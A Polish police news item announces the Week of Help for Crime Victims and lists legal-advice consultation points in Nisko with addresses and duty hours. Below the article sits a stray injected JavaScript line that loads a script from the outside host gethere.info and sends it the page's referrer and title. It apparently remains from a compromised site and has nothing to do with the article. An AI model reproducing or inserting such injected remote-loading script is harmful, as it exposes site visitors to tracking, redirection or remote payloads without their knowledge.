
W poniedziałek, 22 lutego br. rozpoczyna się Tydzień Pomocy Osobom Pokrzywdzonym Przestępstwem. W ramach prowadzonej już po raz kolejny akcji, w komendach policji, sądach i prokuraturach trwają dyżury. Tam, osoby pokrzywdzone przestępstwem mogą uzyskać informacje na temat przysługujących im uprawnień.
Gospodarzem inicjatywy „Tygodnia Pomocy Osobom Pokrzywdzonym Przestępstwem” jest Ministerstwo Sprawiedliwości. Podstawowym celem projektu jest zwrócenie szczególnej uwagi na potrzeby i prawa osób pokrzywdzonych przestępstwem. Przedsięwzięcie to realizowane jest we współpracy z innymi instytucjami, w tym m.in. sądami, prokuratorami, jednostkami organizacyjnymi policji, organizacjami pozarządowymi.
W tym roku działania te, podobnie jak w latach ubiegłych, polegają przede wszystkim na udzielaniu porad prawnych ofiarom przestępstw. Dyżury pełnione są w tzw. punktach konsultacyjnych.
• Prokuratura Rejonowa w Nisku, ul. Sandomierska 19
• Sąd Rejonowy w Nisku, Plac Wolności 14
• Miejski Ośrodek Pomocy Społecznej w Nisku, ul. 3-go Maja 10
• Komenda Powiatowa Policji w Nisku, ul. Sandomierska 6
W Komendzie Powiatowej Policji w Nisku będzie można uzyskać pomoc prawną od dyżurujących specjalistów zajmujących się problematyką kryminalną, przemocy w rodzinie, przestępczości i demoralizacji nieletnich. Funkcjonariusze dyżurować będą w dniach 22-27 lutego br. w godz. 8-20.
Lista ośrodków biorących udział w kampanii i ich adresy znajdują się na stronie internetowej Ministerstwa Sprawiedliwości oraz na stronie www.pokrzywdzeni.gov.pl.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
Facebook
RSS